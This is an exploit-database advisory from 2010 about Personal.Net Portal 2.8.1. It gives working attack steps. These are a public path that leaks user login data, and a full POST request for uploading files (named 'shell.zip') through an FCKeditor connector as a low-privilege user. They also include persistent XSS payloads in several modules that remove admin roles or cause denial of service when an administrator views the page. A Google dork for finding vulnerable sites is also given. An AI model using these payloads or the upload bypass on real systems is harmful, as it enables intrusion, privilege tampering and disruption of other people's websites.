[webapps / 0day] - Personal.Net Portal Multiple Vulnerabilit
Posted on 21 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Personal.Net Portal Multiple Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: webapps / 0day | Exploit author: Abysssec' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>============================================ Personal.Net Portal Multiple Vulnerabilities ============================================ Title : Personal.Net Portal Multiple Vulnerabilities Affected Version : Personal.Net Portal Version 2.8.1 Discovery : www.Abysssec.com Vendor : http://www.dotnet-portal.net/Home.tab.aspx Download Links : http://sourceforge.net/projects/dotnetportal/ Dork : "Personal .NET Portal" Description : =========================================================================================== This version of Personal.Net Portal(2.8.1) have Multiple Valnerabilities : 1- User's Information Revelation 2- Upload a file with normal user that have low privilage 3- Persistent XSS for DDOS and remove Roles and ... (XSRF) User's Information Revelation: =========================================================================================== With this path you can find User's Information of site: http://Example.com/Data/Statistics/Logins.xml this Information includes: UserId LoginCount LastLogin LoginName ( for Example Admin ) FirstName LastName Upload a file with normal user that have low privilage: =========================================================================================== After you logged in as a normal user (for example userName:user and Password:user), in the following path you can upload a specific file with POST Method which is containing user's cookie. http://Example.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=/ For example this POST request: POST http://Example.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1 Host: Example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://Example.com/FCKeditor/editor/filemanager/browser/default/frmupload.html Cookie: ASP.NET_SessionId=wonb3e55eqgbrpnqdhcqly55; dotnetportal.auth=CE8C1A54B9676CDB4F911C820B4F59C50C75F6684E839578C59D289707A340E9EA444119E44E2B155612375255900C6FD3E0C94463E4C0ECEB929872CF2505FC Content-Type: multipart/form-data; boundary=---------------------------125671705429877 Content-Length: 500 -----------------------------125671705429877 Content-Disposition: form-data; name="NewFile"; filename="shell.zip" Content-Type: application/octet-stream ... any thing -----------------------------125671705429877-- Here we have limitation of uploading specific file extension implementing by FckEditor v2 that bypassing this barrier is on you. Uploaded files will be placing in this path: http://Example.com/Data/Resources/file/ Vulnerable Code: The misconfiguration is in ...FCKeditoreditorfilemanagerconnectorsaspxconfig.ascx ln 42: private bool CheckAuthentication() { return Page.User.Identity.IsAuthenticated; } Persistent XSS and XSRF: =========================================================================================== In these Modules you can find Persistent XSS that data saves with no sanitization: 1- Module name: CSVTable Field : text Vulnerable Code: ...ModulesCSVTableeditcsvtable.ascx ln 39: sw.Write(txt.Text); For Example you can enter this script for DDOS: <script>__doPostBack('ctl071$Linkbutton21','')</script> --------------------------------------------------------------------------------------- 2- Module name: Feedback Fields : From , Title , Message Vulnerable Code: ...ModulesFeedbackfeedback.ascx ln 55,56,57: r["From"] = txtFrom.Text; r["Title"] = txtTitle.Text; r["Message"] = txtMessage.Text; --------------------------------------------------------------------------------------- 3- Module name: Html Field : text Vulnerable Code: ...ModulesHtmledithtml.ascx ln 39: w.Write(txt.Text); --------------------------------------------------------------------------------------- 4- Module name: MyUser Fields : First name , Sur name Vulnerable Code: ...ModulesMyUserMyUser.ascx.cs ln 55: UserManagement.SaveUser( Page.User.Identity.Name, pwd, txtFirstName.Text, txtSurName.Text, txtEMail.Text, new System.Collections.ArrayList(principal.Roles), principal.Id); For Example you can enter this script for remove Admin Role: <script>__doPostBack('Content$ctl14$gridRoles$ctl02$ctl00','')</script> or this for remove User Role: <script>__doPostBack('Content$ctl14$gridRoles$ctl03$ctl00','')</script> and when Admin see this page: http://Example.com/default.aspx?TabRef=adminusers the Role will be removed and program will be DDOS. --------------------------------------------------------------------------------------- 5- Module name: News Field : text Vulnerable Code: ...ModulesNewseditnews.ascx ln 70: dr["Text"] = ((System.Web.UI.WebControls.TextBox)e.Item.Cells[4].Controls[1]).Text; --------------------------------------------------------------------------------------- 6- Module name: Quotations Field : text Vulnerable Code: ...ModulesQuotationseditquotations.ascx ln 39: sw.Write(txt.Text); --------------------------------------------------------------------------------------- 7- Module name: Table Field : column Vulnerable Code: ...ModulesTableedittable.ascx ln 65: dr[i] = ((System.Web.UI.WebControls.TextBox)repAddRow.Items[i].FindControl("data")).Text; ln 137: dr[i] = ((System.Web.UI.WebControls.TextBox)e.Item.Cells[i + 2].Controls[0]).Text; --------------------------------------------------------------------------------------- =========================================================================================== # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-21]</pre></body></html>
